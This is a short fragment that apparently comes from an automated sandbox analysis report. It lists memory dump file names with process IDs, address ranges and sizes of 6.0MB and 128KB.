                                                    • memory/4572-272-0x0000000000000000-mapping.dmp

                                                    • memory/4668-286-0x0000000000000000-mapping.dmp

                                                    • memory/5040-330-0x0000000005080000-0x0000000005686000-memory.dmp

                                                      Filesize

                                                      6.0MB

                                                    • memory/5040-320-0x000000000041A6BA-mapping.dmp

                                                    • memory/5040-319-0x0000000000400000-0x0000000000420000-memory.dmp

                                                      Filesize

                                                      128KB